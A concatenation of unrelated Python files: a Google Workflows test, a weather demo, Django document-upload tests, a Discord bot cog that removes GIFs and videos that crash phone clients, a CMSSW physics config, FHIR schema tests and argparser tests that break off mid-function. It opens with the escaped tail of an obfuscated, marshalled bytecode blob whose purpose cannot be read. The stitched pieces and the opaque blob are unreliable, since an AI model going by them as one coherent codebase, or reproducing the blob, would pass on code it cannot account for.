[!] Connected to the Internet[!]r\x10\x00\x00\x00z\x1f[x] No internet Connection [x] z(Connect to internet and run script again)\x0fr\x11\x00\x00\x00r\x06\x00\x00\x00rI\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00rN\x00\x00\x00r#\x00\x00\x00rG\x00\x00\x00r\x0b\x00\x00\x00\xda\x06bannerr\x1e\x00\x00\x00\xda\x0fConnectionErrorZ\x07Timeoutr\x18\x00\x00\x00r\x1b\x00\x00\x00)\x04Z\x08url_siterS\x00\x00\x00Z\x07requestZ\texceptionr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x0echeck_internet\x14\x01\x00\x00s(\x00\x00\x00\x00\x01\x0e\x01\n\x01\x04\x01\x04\x01\x02\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\n\x01\x06\x01\x08\x01\n\x01\x16\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\n\x01rV\x00\x00\x00)\x1crN\x00\x00\x00r\x07\x00\x00\x00r\x19\x00\x00\x00Z\x03bs4r\x02\x00\x00\x00r!\x00\x00\x00Z\x0curllib.parser\x03\x00\x00\x00r\x04\x00\x00\x00Z\ttermcolorr\x05\x00\x00\x00Z\x08coloramar\x06\x00\x00\x00rT\x00\x00\x00r\x13\x00\x00\x00r\x0b\x00\x00\x00r\x1e\x00\x00\x00Z\x07Sessionr"\x00\x00\x00Z\x07headersr\'\x00\x00\x00r9\x00\x00\x00r=\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00rP\x00\x00\x00r\x17\x00\x00\x00rV\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s2\x00\x00\x00\x08\x01\x08\x01\x08\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x06\x04\x16\x04\n\x08\x04\x08\x1e\x08\x01\n\x02\x08\x06\x08\x19\x08\x13\x08/\x04\x0c\x08\x05\x08\x15\x08 \x08\x18\x08\x16\x06\x01'))
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from google.cloud import workflows_v1beta
import main
PROJECT = os.environ["GOOGLE_CLOUD_PROJECT"]
LOCATION = "us-central1"
WORKFLOW_ID = "myFirstWorkflow"
def test_workflow_execution():
assert PROJECT != ""
if not workflow_exists():
workflow_file = open("myFirstWorkflow.workflows.yaml", "r").read()
workflows_client = workflows_v1beta.WorkflowsClient()
workflows_client.create_workflow(request={
# Manually construct the location
# https://github.com/googleapis/python-workflows/issues/21
"parent": f'projects/{PROJECT}/locations/{LOCATION}',
"workflow_id": WORKFLOW_ID,
"workflow": {
"name": WORKFLOW_ID,
"source_contents": workflow_file
}
})
result = main.execute_workflow(PROJECT)
assert len(result) > 0
def workflow_exists():
"""Returns True if the workflow exists in this project
"""
try:
workflows_client = workflows_v1beta.WorkflowsClient()
workflow_name = workflows_client.workflow_path(PROJECT, LOCATION, WORKFLOW_ID)
workflows_client.get_workflow(request={"name": workflow_name})
return True
except Exception as e:
print(f"Workflow doesn't exist: {e}")
return False
|
from weather import Weather
weather = Weather(verbose=1)
region = weather.getRegion() # all supported regions
cities = weather.getCity() # all supported cities
support = weather.getRegionCity(region='巴西') # supported cities in Brazil
result = weather.getWeather(city='广州') # query the weather for Guangzhou
print('number of supported regions', len(region))
print('number of supported cities', len(cities))
print('supported cities in Brazil', support)
print('weather in Guangzhou', result)
|
import pandas as pd
from TemporalFeatureFactory import TemporalFeatureFactory, temporal_driver
from utils.misc_utils import connect_rds
###
# DEFINE SETTINGS TO CREATE TEMPORAL FEATURES
###
time_granularity = '60min'
start_date = '2016-01-01'
end_date = '2018-02-01'
conn = connect_rds()
schema_name = 'features_temporal_agg'
###
# CREATE TEMPORAL TABLE
###
t = temporal_driver(time_granularity, start_date, end_date, conn, schema_name)
|
import datetime
from unittest import mock
from django.urls import reverse
from api.organisations.enums import OrganisationDocumentType
from test_helpers.clients import DataTestClient
class OrganisationDocumentViewTests(DataTestClient):
def create_document_on_organisation(self, name):
url = reverse("organisations:documents", kwargs={"pk": self.organisation.pk})
data = {
"document": {"name": name, "s3_key": name, "size": 476},
"expiry_date": "2022-01-01",
"reference_code": "123",
"document_type": OrganisationDocumentType.FIREARM_SECTION_FIVE,
}
return self.client.post(url, data, **self.exporter_headers)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_create_organisation_document(self):
response = self.create_document_on_organisation("some-document")
self.assertEqual(response.status_code, 201, msg=response.content)
self.assertEqual(self.organisation.document_on_organisations.count(), 1)
instance = self.organisation.document_on_organisations.first()
self.assertEqual(instance.document.name, "some-document")
self.assertEqual(instance.document.s3_key, "some-document")
self.assertEqual(instance.reference_code, "123")
self.assertEqual(instance.document.size, 476)
self.assertEqual(instance.expiry_date, datetime.date(2022, 1, 1))
self.assertEqual(instance.document_type, OrganisationDocumentType.FIREARM_SECTION_FIVE)
self.assertEqual(instance.organisation, self.organisation)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_list_organisation_documents(self):
self.assertEqual(self.create_document_on_organisation("some-document-one").status_code, 201)
self.assertEqual(self.create_document_on_organisation("some-document-two").status_code, 201)
self.assertEqual(self.create_document_on_organisation("some-document-three").status_code, 201)
url = reverse("organisations:documents", kwargs={"pk": self.organisation.pk})
response = self.client.get(url, **self.exporter_headers)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.json()["documents"]), 3)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_retrieve_organisation_documents(self):
response = self.create_document_on_organisation("some-document-one")
self.assertEqual(response.status_code, 201)
document_on_application_pk = response.json()["document"]["id"]
url = reverse(
"organisations:documents",
kwargs={"pk": self.organisation.pk, "document_on_application_pk": document_on_application_pk},
)
response = self.client.get(url, **self.exporter_headers)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.json(),
{
"id": document_on_application_pk,
"expiry_date": "01 January 2022",
"document_type": "section-five-certificate",
"organisation": str(self.organisation.id),
"is_expired": False,
"reference_code": "123",
"document": {
"name": "some-document-one",
"s3_key": "some-document-one",
"size": 476,
"created_at": mock.ANY,
"safe": None,
"id": mock.ANY,
},
},
)
|
from PIL import Image
from io import BytesIO
import aiohttp
import discord
import functools
import logging
import os
import secrets
import subprocess
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
log = logging.getLogger("red.aikaterna.antiphoneclapper")
class AntiPhoneClapper(commands.Cog):
"""This cog deletes bad GIFs and MP4s that will crash phone clients."""
async def red_delete_data_for_user(self, **kwargs):
"""Nothing to delete."""
return
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, 2719371001, force_registration=True)
default_guild = {"watching": []}
self.config.register_guild(**default_guild)
@commands.group()
@checks.mod_or_permissions(administrator=True)
@commands.guild_only()
async def nogif(self, ctx):
"""Configuration options."""
pass
@nogif.command()
async def watch(self, ctx, channel: discord.TextChannel):
"""
Add a channel to watch.
Gif and MP4 attachments and links that break mobile clients will be removed in these channels.
"""
channel_list = await self.config.guild(ctx.guild).watching()
if channel.id not in channel_list:
channel_list.append(channel.id)
await self.config.guild(ctx.guild).watching.set(channel_list)
await ctx.send(f"{self.bot.get_channel(channel.id).mention} will have bad gifs removed.")
@nogif.command()
async def watchlist(self, ctx):
"""List the channels being watched."""
channel_list = await self.config.guild(ctx.guild).watching()
msg = "Bad gifs will be removed in:\n"
for channel in channel_list:
channel_obj = self.bot.get_channel(channel)
msg += f"{channel_obj.mention}\n"
await ctx.send(msg)
@nogif.command()
async def unwatch(self, ctx, channel: discord.TextChannel):
"""Remove a channel from the watch list."""
channel_list = await self.config.guild(ctx.guild).watching()
if channel.id in channel_list:
channel_list.remove(channel.id)
else:
return await ctx.send("Channel is not being watched.")
await self.config.guild(ctx.guild).watching.set(channel_list)
await ctx.send(f"{self.bot.get_channel(channel.id).mention} will not have bad gifs removed.")
@commands.Cog.listener()
async def on_message(self, m):
if not m.channel.guild:
return
if m.author.bot:
return
watch_channel_list = await self.config.guild(m.guild).watching()
if not watch_channel_list:
return
if m.channel.id not in watch_channel_list:
return
link = False
phone_clapper = None
if m.content:
if m.content.startswith("https://cdn.discordapp.com/attachments/"):
link = True
if not link:
for att in m.attachments:
if att.size > 8000000:
continue
if att.filename.endswith(".mp4"):
phone_clapper = await self._is_video_clapper(att.url)
if att.filename.endswith(".gif"):
phone_clapper = await self._is_image_clapper(att.url)
else:
maybe_url = m.content.split()[0]
if maybe_url.endswith(".mp4"):
phone_clapper = await self._is_video_clapper(maybe_url)
if maybe_url.endswith(".gif"):
phone_clapper = await self._is_image_clapper(maybe_url)
if phone_clapper:
try:
await m.delete()
await m.channel.send(f"{m.author.mention} just tried to send a bad file and I removed it.")
return
except discord.errors.Forbidden:
await m.channel.send(f"Don't send malicious files, {m.author.mention}")
log.debug(f"Failed to delete message ({m.id}) that contained a Discord killing gif or mp4 video.")
return
else:
return
def is_phone_clapper(self, im):
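        # A "phone clapper" GIF declares at least one frame whose tile region extends
        # past the image's own canvas size; those oversized frames are what crash
        # mobile clients, so flag the file if any frame's tile exceeds the canvas.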
limit = im.size
tile_sizes = []
for frame in range(im.n_frames):
im.seek(frame)
tile_sizes.append(im.tile[0][1][2:])
return any([x[0] > limit[0] or x[1] > limit[1] for x in tile_sizes])
async def _is_image_clapper(self, url):
async with aiohttp.ClientSession() as session:
            async with session.get(url) as resp:
data = await resp.content.read()
f = BytesIO(data)
try:
img = Image.open(f)
            phone_clapper = self.is_phone_clapper(img)
            return phone_clapper
except Image.DecompressionBombError:
return True
async def _is_video_clapper(self, input_file):
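        # Download the video, then play it with ffplay at debug log level; if ffplay
        # reports that the frame size changed mid-stream, treat the file as one that
        # crashes mobile clients.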
r = secrets.token_hex(6)
video_name = f"temp_vid_{r}.mp4"
video_file = f"{cog_data_path(self)}/{video_name}"
text_name = f"temp_output_{r}.txt"
text_file = f"{cog_data_path(self)}/{text_name}"
async with aiohttp.ClientSession() as session:
async with session.get(input_file) as resp:
data = await resp.content.read()
with open(video_file, "wb+") as g:
g.write(data)
f = open(text_file, "wb+")
try:
            # Run the blocking ffplay call in a thread executor so the event loop isn't blocked.
            await self.bot.loop.run_in_executor(None, functools.partial(
                subprocess.call, ["ffplay.exe", video_file, "-autoexit", "-loglevel", "+debug"],
                stdout=f, stderr=subprocess.STDOUT, timeout=60))
except subprocess.CalledProcessError as e:
log.error(e.output)
return
except subprocess.TimeoutExpired:
f.close()
os.remove(video_file)
os.remove(text_file)
log.error("Timeout expired trying to read a video file")
return
f.close()
f = open(text_file, "r")
content = f.read()
if "Video frame changed from size:" in content:
phone_clapper = True
else:
phone_clapper = False
f.close()
os.remove(video_file)
os.remove(text_file)
return phone_clapper
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("DCRec")
process.load("Configuration.StandardSequences.MagneticField_cff")
#process.load("Configuration.StandardSequences.Geometry_cff") # Depreciated
process.load("Configuration.Geometry.GeometryIdeal_cff")
process.load("Configuration.EventContent.EventContent_cff")
process.load("Geometry.CaloEventSetup.CaloGeometry_cfi")
process.load("Geometry.CaloEventSetup.CaloTopology_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.globaltag = cms.string('START53_V10::All')
process.GlobalTag.globaltag = 'GR_P_V42_AN2::All' # this one for run2012D
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
# *****************************************************************
# Input Source
# *****************************************************************
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
# '/store/relval/CMSSW_2_2_4/RelValTTbar/GEN-SIM-RECO/STARTUP_V8_v1/0000/200EB7E3-90F3-DD11-B1B0-001D09F2432B.root',
# '/eos/cms/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# '/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# 'file:/afs/cern.ch/work/v/vgiakoum/public/8200EF9B-0AA0-E111-9E58-003048FFCB6A.root'
# 'file:/afs/cern.ch/work/i/ikesisog/public/TestFiles/8200EF9B-0AA0-E111-9E58-003048FFCB6A.root'
'/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/30ABB9D1-790E-E211-AFF1-001D09F242EF.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/3E8BBC89-620E-E211-9185-001D09F25479.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/DC93F9B0-6B0E-E211-8F48-003048D37560.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/FA29ECAC-640E-E211-A95F-001D09F28D54.root',
# 'root://eoscms//eos/cms/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# 'rfio:/afs/cern.ch/user/i/ikesisog/public/22521942-41F7-E111-A383-003048D375AA.root',
)
)
# *****************************************************************
# Output Target
# *****************************************************************
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('Results_vic.root'),
outputCommands = cms.untracked.vstring('keep EcalRecHitsSorted_*_*_*'),
#SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring("p") ),
)
# *****************************************************************
# RecHitsKiller and RecHitRecoveryProducer module for Barrel
# *****************************************************************
process.CreateEBDeadCells = cms.EDProducer("EBChannelKiller",
hitTag = cms.InputTag("reducedEcalRecHitsEB", ""),
reducedHitCollection = cms.string("CreateEB"),
KilledHitCollection = cms.string("KilledEcalRecHitsEB"),
DeadChannelsFile = cms.string("EBDeadCellsEach5.txt"),
KillDeadCells = cms.bool(True),
)
process.ModCorrectEBDeadCells = cms.EDProducer("EBDeadChannelRecoveryProducers",
hitTag = cms.InputTag("CreateEBDeadCells", "CreateEB"),
reducedHitCollection = cms.string("ModifyEB"),
DeadChannelsFile = cms.string("EBDeadCellsEach5.txt"),
Sum8GeVThreshold = cms.double(8.0),
CorrectionMethod = cms.string("NeuralNetworks"),
CorrectDeadCells = cms.bool(True),
)
# *****************************************************************
# RecHitsKiller and RecHitRecoveryProducer module for EndCap
# *****************************************************************
process.CreateEEDeadCells = cms.EDProducer("EEChannelKiller",
hitTag = cms.InputTag("reducedEcalRecHitsEE", ""),
reducedHitCollection = cms.string("CreateEE"),
KilledHitCollection = cms.string("KilledEcalRecHitsEE"),
DeadChannelsFile = cms.string("EEDeadCellsEach5.txt"),
KillDeadCells = cms.bool(True),
)
process.ModCorrectEEDeadCells = cms.EDProducer("EEDeadChannelRecoveryProducers",
hitTag = cms.InputTag("CreateEEDeadCells", "CreateEE"),
reducedHitCollection = cms.string("ModifyEE"),
DeadChannelsFile = cms.string("EEDeadCellsEach5.txt"),
Sum8GeVThreshold = cms.double(8.0),
CorrectionMethod = cms.string("NeuralNetworks"),
CorrectDeadCells = cms.bool(True),
)
process.TFileService = cms.Service("TFileService", fileName = cms.string('recovery_hist.root'))
process.validateRecoveryEB = cms.EDAnalyzer("EcalDeadChannelRecoveryAnalyzer",
originalRecHitCollection = cms.InputTag("reducedEcalRecHitsEB", ""),
recoveredRecHitCollection = cms.InputTag("ModCorrectEBDeadCells", "ModifyEB"),
titlePrefix = cms.string("(EB) "),
)
process.validateRecoveryEE = cms.EDAnalyzer("EcalDeadChannelRecoveryAnalyzer",
originalRecHitCollection = cms.InputTag("reducedEcalRecHitsEE", ""),
recoveredRecHitCollection = cms.InputTag("ModCorrectEEDeadCells", "ModifyEE"),
titlePrefix = cms.string("(EE) "),
)
process.dump = cms.EDAnalyzer("EcalRecHitDump",
EBRecHitCollection = cms.InputTag("ModCorrectEBDeadCells", "ModifyEB"),
EERecHitCollection = cms.InputTag("ModCorrectEEDeadCells", "ModifyEE"),
)
# *****************************************************************
# Execution Path
# *****************************************************************
process.p = cms.Path(process.CreateEBDeadCells * process.ModCorrectEBDeadCells * process.validateRecoveryEB +
process.CreateEEDeadCells * process.ModCorrectEEDeadCells * process.validateRecoveryEE )
process.outpath = cms.EndPath(process.out)
|
import json
from typing import cast, List
from fhir.resources.claim import Claim
from fhir.resources.claim import ClaimItem
from fhir.resources.address import Address
from fhir.resources.organization import Organization
from schema.insight_engine_response import InsightEngineResponse, Insight, InsightType, Trace
def test_Address():
myAddr = Address()
myAddr.city = 'City'
assert myAddr.city == "City"
def test_claim1():
with open("schema/claim1.json") as claim1file:
claim1json = json.load(claim1file)
claim1 = Claim(**claim1json)
assert claim1.id == "claim1234"
assert claim1.type.id == "something"
items = cast(List[ClaimItem], claim1.item)
item = items[0]
coding = item.productOrService.coding[0]
assert coding.code == "0028U"
def test_json_str():
json_dict = {"resourceType": "Organization",
"id": "mmanu",
"active": True,
"name": "Acme Corporation",
"address": [{"country": "Swizterland"}]
}
org = Organization(**json_dict)
assert isinstance(org.address[0], Address)
assert org.address[0].country == "Swizterland"
js = org.json()
assert json.loads(js)['active'] is True
def test_response():
json_dict = {
"id": "10",
"insights": [
{
"id": "1"
}
]
}
response = InsightEngineResponse(**json_dict)
assert len(response.insights) == 1
def test_file_deserialization():
response = InsightEngineResponse.parse_file('schema/InsightEngineResponse.json')
insight: Insight = response.insights[0]
assert insight.description == "No"
assert insight.type == InsightType.NotApplicable
def get_trace() -> Trace:
trace = Trace()
trace.tree_name = 'Fictitious tree'
trace.end_label = '1200N'
trace.traversal = [
('Is CUE professional?', 'YES'),
('Is the CLUE procedureCode an E/M code?', 'NO'),
('Is modifier 78 present in any modifier field in the CLUE?', 'NO'),
('Are there OC for same patient as the CLUE?', 'YES'),
('Are there OCL (same or different claim) with an anesthesia procedureCode?', 'YES'),
('Are there OCL on the same day as the CLUE?', 'NO')
]
return trace
def get_insight() -> Insight:
trace = get_trace()
return Insight(
id='TEST-CLAIM',
type=InsightType.ClaimLineValid,
description='No other claims on the same day with anesthesia code.',
trace=[trace],
policy_name='Fictitious policy',
claim_line_sequence_num=1
)
def get_response() -> InsightEngineResponse:
insight = get_insight()
return InsightEngineResponse(
insights=[insight],
engine_name='fictitious-engine'
)
def test_trace():
trace = get_trace()
# Simulate writing and reading the trace to/from a file...
obj = json.loads(trace.json())
t = Trace.parse_obj(obj)
assert t.tree_name == 'Fictitious tree'
assert t.end_label == '1200N'
assert t.traversal[2][0] == 'Is modifier 78 present in any modifier field in the CLUE?'
assert t.traversal[2][1] == 'NO'
assert len(t.traversal) == 6
def test_insight_trace_and_policy_name():
insight = get_insight()
# Simulate writing and reading the insight to/from a file...
obj = json.loads(insight.json())
i = Insight.parse_obj(obj)
assert i.policy_name == 'Fictitious policy'
assert i.type == InsightType.ClaimLineValid
assert i.description == 'No other claims on the same day with anesthesia code.'
assert i.claim_line_sequence_num == 1
assert len(i.trace) == 1
assert i.trace[0].traversal[4][0] == 'Are there OCL (same or different claim) with an anesthesia procedureCode?'
assert i.trace[0].traversal[4][1] == 'YES'
def test_response_engine_name():
response = get_response()
# Simulate writing and reading the response to/from a file...
obj = json.loads(response.json())
r = InsightEngineResponse.parse_obj(obj)
assert r.engine_name == 'fictitious-engine'
assert len(r.insights) == 1
assert r.insights[0].policy_name == 'Fictitious policy'
assert r.insights[0].type == InsightType.ClaimLineValid
assert r.insights[0].description == 'No other claims on the same day with anesthesia code.'
assert r.insights[0].claim_line_sequence_num == 1
assert len(r.insights[0].trace) == 1
assert r.insights[0].trace[0].traversal[3][0] == 'Are there OC for same patient as the CLUE?'
assert r.insights[0].trace[0].traversal[3][1] == 'YES'
def test_old_response():
res = InsightEngineResponse.parse_file('tests/sample-response.json')
assert len(res.insights) == 1
assert res.insights[0].policy_name is None
assert res.insights[0].trace is None
assert res.engine_name is None
assert res.insights[0].defense.script.messages[0].message == "Some message."
|
#!/usr/bin/python
# Classification (U)
"""Program: argparser_arg_parse2.py
Description: Integration testing of arg_parse2 in
gen_class.ArgParser class.
Usage:
test/integration/gen_class/argparser_arg_parse2.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import gen_class
import gen_libs
import version
__version__ = version.__version__
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_opt_val_bin_override2
test_opt_val_bin_override
test_multi_val_override2
test_multi_val_override
test_opt_def_override2
test_opt_def_override
test_opt_val_override2
test_opt_val_override
test_all_together
test_multiple_opt_def
test_multilist_multiple_val
test_multi_val_one_val
test_multi_val_no_val
test_multi_val_def_arg
test_multi_val_two_args
test_multi_val_one_arg
test_opt_val_arg_int
test_opt_val_bin
test_opt_def_no_val2
test_opt_def_no_val
test_opt_val_two_arg
test_opt_val_one_arg
test_arg_value_not_set
test_prog_with_arg
test_with_two_args
test_with_one_arg
test_argv_no_args
test_empty_argv_list2
test_empty_argv_list
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
p_name = "program.py"
p_path = "/path"
self.argv = [p_name]
self.argv2 = [p_name, "-M"]
self.argv3 = [p_name, "-M", "-a"]
self.argv4 = [p_name, "-M", "merge"]
self.argv5 = [p_name, "-c", "cfg", "-d", p_path]
self.argv6 = [p_name, "-c", "cfg", "-d"]
self.argv7 = [p_name, "-c", "-1"]
self.argv8 = [p_name, "-f", "file1", "file2"]
self.argv9 = [p_name, "-f", "file1", "file2", "-g", "file3", "file4"]
self.argv10 = [p_name, "-f"]
self.argv11 = [p_name, "-f", "file5"]
self.argv12 = [p_name, "-f", "file1", "file2", "file3"]
self.argv13 = [p_name, "-f", "-g"]
self.argv14 = [
p_name, "-c", "cfg", "-d", p_path, "-M", "-f", "file1", "file2"]
self.opt_val = ["-c", "-d", "-f", "-g"]
self.opt_val2 = ["-M", "-a"]
self.opt_def = {"-g": ["def_val"], "-f": ["file1", "file2"]}
self.opt_def2 = {"-f": ["file1"]}
self.multi_val = ["-f", "-g"]
self.multi_val2 = ["-g"]
self.opt_val_bin = ["-d"]
self.opt_val_bin2 = ["-M", "-a"]
self.results = {"-M": True}
self.results2 = {"-M": True, "-a": True}
self.results3 = {"-M": "merge"}
self.results4 = {"-c": "cfg", "-d": p_path}
self.results5 = {"-c": "cfg"}
self.results6 = {"-c": "cfg", "-d": None}
self.results7 = {"-c": "-1"}
self.results8 = {"-f": ["file1", "file2"]}
self.results9 = {"-f": ["file1", "file2"], "-g": ["file3", "file4"]}
self.results10 = {"-f": ["file1"]}
self.results11 = {"-f": ["file5"]}
self.results12 = {"-f": ["file1", "file2", "file3"]}
self.results13 = {"-g": ["def_val"], "-f": ["file1", "file2"]}
self.results14 = {"-c": "cfg", "-d": p_path, "-M": True,
"-f": ["file1", "file2"]}
self.results15 = {"-f": "file5"}
self.results16 = {"-M": None, "-a": None}
def test_opt_val_bin_override2(self):
"""Function: test_opt_val_bin_override2
Description: Test with opt_val_bin passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv3, opt_val_bin=self.opt_val_bin)
self.assertTrue(args_array.arg_parse2(opt_val_bin=self.opt_val_bin2))
def test_opt_val_bin_override(self):
"""Function: test_opt_val_bin_override
Description: Test with opt_val_bin passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv3, opt_val_bin=self.opt_val_bin)
args_array.arg_parse2(opt_val_bin=self.opt_val_bin2)
self.assertEqual(args_array.args_array, self.results16)
def test_multi_val_override2(self):
"""Function: test_multi_val_override2
Description: Test with multi_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val)
self.assertTrue(args_array.arg_parse2(multi_val=self.multi_val2))
def test_multi_val_override(self):
"""Function: test_multi_val_override
Description: Test with multi_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val)
args_array.arg_parse2(multi_val=self.multi_val2)
self.assertEqual(args_array.args_array, self.results15)
def test_opt_def_override2(self):
"""Function: test_opt_def_override2
Description: Test with opt_def passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2)
self.assertTrue(args_array.arg_parse2(opt_def=self.opt_def))
def test_opt_def_override(self):
"""Function: test_opt_def_override
Description: Test with opt_def passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2)
args_array.arg_parse2(opt_def=self.opt_def)
self.assertEqual(args_array.args_array, self.results8)
def test_opt_val_override2(self):
"""Function: test_opt_val_override2
Description: Test with opt_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, opt_val=self.opt_val2)
self.assertTrue(args_array.arg_parse2(opt_val=self.opt_val))
def test_opt_val_override(self):
"""Function: test_opt_val_override
Description: Test with opt_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, opt_val=self.opt_val2)
args_array.arg_parse2(opt_val=self.opt_val)
self.assertEqual(args_array.args_array, self.results)
def test_all_together(self):
"""Function: test_all_together
Description: Test with all options together.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv14, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def, do_parse=True)
self.assertEqual(args_array.args_array, self.results14)
def test_multiple_opt_def(self):
"""Function: test_multiple_opt_def
Description: Test with multiple default values with multi_val.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv13, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def, do_parse=True)
self.assertEqual(args_array.args_array, self.results13)
def test_multilist_multiple_val(self):
"""Function: test_multilist_multiple_val
Description: Test with multi_list set to multiple values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv12, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results12)
def test_multi_val_one_val(self):
"""Function: test_multi_val_one_val
Description: Test with multi_list set to one value.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results11)
def test_multi_val_no_val(self):
"""Function: test_multi_val_no_val
Description: Test with multi_list and setting one of them using
default values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val)
with gen_libs.no_std_out():
self.assertFalse(args_array.arg_parse2())
def test_multi_val_def_arg(self):
"""Function: test_multi_val_def_arg
Description: Test with multi_list and setting one of them using
default values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2, do_parse=True)
self.assertEqual(args_array.args_array, self.results10)
def test_multi_val_two_args(self):
"""Function: test_multi_val_two_args
Description: Test with multi_val set to two arguments with multiple
values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv9, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results9)
def test_multi_val_one_arg(self):
"""Function: test_multi_val_one_arg
Description: Test with multi_val set to one argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv8, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results8)
def test_opt_val_arg_int(self):
"""Function: test_opt_val_arg_int
Description: Test with opt_val_set set to integer value.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv7, opt_val=self.opt_val, do_parse=True)
self.assertEqual(args_array.args_array, self.results7)
def test_opt_val_bin(self):
"""Function: test_opt_val_bin
Description: Test with opt_val_bin set with no value passed in for the
argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv6, opt_val=self.opt_val, opt_val_bin=self.opt_val_bin,
do_parse=True)
self.assertEqual(args_array.args_array, self.results6)
def test_opt_def_no_val2(self):
"""Function: test_opt_def_no_val2
Description: Test with opt_def but no value.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv6, opt_val=self.opt_val)
with gen_libs.no_std_out():
self.assertFalse(args_array.arg_parse2())
def test_opt_def_no_val(self):
"""Function: test_opt_def_no_val
Description: Test with opt_def but no value.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv6, opt_val=self.opt_val)
with gen_libs.no_std_out():
args_array.arg_parse2()
self.assertEqual(args_array.args_array, self.results5)
def test_opt_val_two_arg(self):
"""Function: test_opt_val_two_arg
Description: Test with opt_val set to two arguments.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv5, opt_val=self.opt_val, do_parse=True)
self.assertEqual(args_array.args_array, self.results4)
def test_opt_val_one_arg(self):
"""Function: test_opt_val_one_arg
Description: Test with opt_val set to one argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv4, opt_val=self.opt_val2, do_parse=True)
self.assertEqual(args_array.args_array, self.results3)
def test_arg_value_not_set(self):
"""Function: test_arg_value_not_set
Description: Test with argument with value, but not set in opt_val.
Arguments:
"""
